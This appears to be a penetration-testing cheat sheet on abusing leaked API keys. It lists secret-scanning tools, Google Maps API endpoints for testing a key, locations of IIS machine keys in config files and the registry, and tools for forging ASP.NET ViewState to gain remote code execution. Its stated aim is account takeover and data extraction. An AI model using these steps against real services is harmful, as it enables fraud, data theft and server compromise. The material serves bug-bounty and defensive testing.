API Key Leaks
The API key is a unique identifier that is used to authenticate requests associated with your project. Some developers might hardcode them or leave it on public shares.
Summary
Tools
Exploit
Google Maps
Algolia
Slack API Token
Facebook Access Token
Github client id and client secret
Twilio Account_sid and Auth Token
Twitter API Secret
Twitter Bearer Token
Gitlab Personal Access Token
HockeyApp API Token
IIS Machine Keys
Mapbox API Token
Tools
momenbasel/KeyFinder - is a tool that let you find keys while surfing the web
streaak/keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid
trufflesecurity/truffleHog - Find credentials all over the place
aquasecurity/trivy - General purpose vulnerability and misconfiguration scanner which also searches for API keys/secrets
projectdiscovery/nuclei-templates - Use these templates to test an API token against many API service endpoints
blacklanternsecurity/badsecrets - A library for detecting known or weak secrets on across many platforms
mazen160/secrets-patterns-db - Secrets Patterns DB: The largest open-source Database for detecting secrets, API keys, passwords, tokens, and more.
Exploit
The following commands can be used to takeover accounts or extract personal information from the API using the leaked token.
Google Maps
Use : https://github.com/ozguralp/gmapsapiscanner/
Usage:
Name | Endpoint |
---|---|
Static Maps | https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key=KEY_HERE |
Streetview | https://maps.googleapis.com/maps/api/streetview?size=400x400&location=40.720032,-73.988354&fov=90&heading=235&pitch=10&key=KEY_HERE |
Embed | https://www.google.com/maps/embed/v1/place?q=place_id:ChIJyX7muQw8tokR2Vf5WBBk1iQ&key=KEY_HERE |
Directions | https://maps.googleapis.com/maps/api/directions/json?origin=Disneyland&destination=Universal+Studios+Hollywood4&key=KEY_HERE |
Geocoding | https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key=KEY_HERE |
Distance Matrix | https://maps.googleapis.com/maps/api/distancematrix/json?units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626&key=KEY_HERE |
Find Place from Text | https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of%20Contemporary%20Art%20Australia&inputtype=textquery&fields=photos,formatted_address,name,rating,opening_hours,geometry&key=KEY_HERE |
Autocomplete | https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=%28cities%29&key=KEY_HERE |
Elevation | https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-104.9847034&key=KEY_HERE |
Timezone | https://maps.googleapis.com/maps/api/timezone/json?location=39.6034810,-119.6822510×tamp=1331161200&key=KEY_HERE |
Roads | https://roads.googleapis.com/v1/nearestRoads?points=60.170880,24.942795 |
Geolocate | https://www.googleapis.com/geolocation/v1/geolocate?key=KEY_HERE |
Impact:
Consuming the company's monthly quota or can over-bill with unauthorized usage of this service and do financial damage to the company
Conduct a denial of service attack specific to the service if any limitation of maximum bill control settings exist in the Google account
Algolia
Slack API Token
Facebook Access Token
Github client id and client secret
Twilio Account_sid and Auth token
Twitter API Secret
Twitter Bearer Token
Gitlab Personal Access Token
HockeyApp API Token
IIS Machine Keys
That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.
Requirements
machineKey validationKey and decryptionKey
__VIEWSTATEGENERATOR cookies
__VIEWSTATE cookies
Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication.
Common locations of web.config / machine.config
32-bit
C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config
64-bit
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\config\machine.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\machine.config
in registry when AutoGenerate is enabled (extract with https://gist.github.com/irsdl/36e78f62b98f879ba36f72ce4fda73ab)
HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\4.0.30319.0\AutoGenKeyV4
HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\2.0.50727.0\AutoGenKey
Identify known machine key
Exploit with Blacklist3r/AspDotNetWrapper
Exploit with ViewGen
Decode ViewState
Generate ViewState for RCE
NOTE: Send a POST request with the generated ViewState to the same endpoint, in Burp you should URL Encode Key Characters for your payload.
Edit cookies with the machine key
If you have the machineKey but the viewstate is disabled.
ASP.net Forms Authentication Cookies : https://github.com/liquidsec/aspnetCryptTools
Mapbox API Token
A Mapbox API Token is a JSON Web Token (JWT). If the header of the JWT is sk
, jackpot. If it's pk
or tk
, it's not worth your time.
References
Last updated